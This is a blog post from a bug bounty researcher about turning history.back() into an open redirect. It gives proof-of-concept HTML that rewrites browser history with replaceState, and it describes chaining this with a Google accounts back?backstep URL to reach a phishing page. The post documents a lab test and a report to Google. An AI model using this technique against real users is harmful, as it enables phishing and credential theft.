Phishing with history.back() open redirect

hyde
hyde
Sep 9, 2017 · 2 min read

While participating in a private bug bounty program I ran into a WAF error page that contained details about the request as well as a hyperlink that would send the user back one page. After playing around with some javascript, I was able to use this technique as an open redirect on all buttons that use the history.back() or history.go(-int) function for web applications that use a back button controlled by the history.back() or history.go(-1) function, assuming the payload is the page you are being sent back to.

Payload (index.html):

<html>
<head>
<title>Continue</title>
</head>
<body>
<a onclick=exploit() href="example_of_vuln.html">Continue...</a>
<script>
function exploit(){
history.replaceState({page: 1}, "Exploit", "index.htm");
}
</script>
</body>
</html>

Example of a vulnerable page (example_of_vuln.html):

<script>alert('Going Back!');history.back()</script>

After Exploitation (index.htm):

<html>
<head>
<title>Exploited</title>
</head>
<body>
<h1>Your browser history was manipulated to send you to a page you never even visited!</h1>
</body>
</html>

I didn’t think this would be very applicable to a real life threat scenario until I discovered that google.com has a page located below which allows a user to determine how many times they would go backwards in their history using the javascript function history.go(-n), ‘n’ being the integer provided in the backstep GET parameter.

https://accounts.google.com/_/back?backstep=1

In a lab environment I was able to use this bug as a phishing vector. I found out that I could lead a target from my payload linking directly to a Google Sites blog which contained the following url as a hyperlink:

https://accounts.google.com/_/back?backstep=2

And finally, onto the ‘Malicious Page’.

To better show the flow:

Payload -> Google Sites Blog -> Click on the URL: https://accounts.google.com/_/back?backstep=2 -> Demo Phishing Page

I submitted a report to Google about this through their bug bounty program without much luck, however it was still fun to research and develop a potential attack scenario.

Initial Payload:

Vulnerable Page:

Exploit Successful, note that the first image is /index.html and page is sent back to a page that you never even visited (index.htm).

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store